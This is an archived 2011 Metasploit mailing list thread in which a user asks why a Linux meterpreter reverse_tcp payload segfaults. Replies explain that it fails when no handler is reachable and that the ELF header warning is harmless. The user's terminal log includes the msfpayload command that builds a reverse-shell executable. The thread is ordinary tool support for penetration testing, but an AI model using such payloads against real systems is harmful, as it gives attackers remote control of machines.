Home page logo

metasploit logo Metasploit mailing list archives

Re: Is Linux meterpreter broken?
From: egypt () metasploit com
Date: Thu, 9 Jun 2011 12:52:56 -0600

Yup, Rob has it right here.  If session initiation fails (e.g. because
the handler isn't set up or there is a network issue preventing it
from getting the second stage), the payload will run off the end of
the .text section, causing a segfault.  The "corrupted header size" is
an artifact of how we build the ELF and can be safely ignored.  At
some point we'll probably revamp it a bit so it looks a little more
like a regular ELF.

Hope this helped,

On Thu, Jun 9, 2011 at 8:07 AM, Rob Fuller <mubix () room362 com> wrote:
Someone will correct me if I'm wrong, but I believe all linux based
payloads will segfault if they cannot create a connection to the
handler, so set up a multi/handler and see if it still segfaults.

Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org

On Thu, Jun 9, 2011 at 7:23 AM, Crypto Cracker <cryptocracker () gmail com> wrote:
Backtrack 5 (x86, KDE) on VirtualBox 4.0.8 r71778:
root () bt:/pentest/exploits/framework3# apt-get update
Hit http://32.repository.backtrack-linux.org revolution Release.gpg
Reading package lists... Done
root () bt:/pentest/exploits/framework3# apt-get upgrade
Reading package lists... Done
0 upgraded, 0 newly installed, 0 to remove and 4 not upgraded.
root () bt:/pentest/exploits/framework3# uname -a
Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
root () bt:/pentest/exploits/framework3# svn up
At revision 12886.

[so everything up to date]

root () bt:/pentest/exploits/framework3# ./msfpayload
linux/x86/meterpreter/reverse_tcp LHOST= LPORT=80 X >
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
Ā Length: 50
Options: {"LHOST"=>"", "LPORT"=>"80"}
root () bt:/pentest/exploits/framework3# file linux.meterpreter
linux.meterpreter: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, corrupted section header size
root () bt:/pentest/exploits/framework3#
[doh! corrupted section header size!! and of course:]
root () bt:/pentest/exploits/framework3# chmod +x linux.meterpreter
root () bt:/pentest/exploits/framework3# ./linux.meterpreter
Segmentation fault
root () bt:/pentest/exploits/framework3#

or am I doing something wrong?

Thanks a lot,





  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]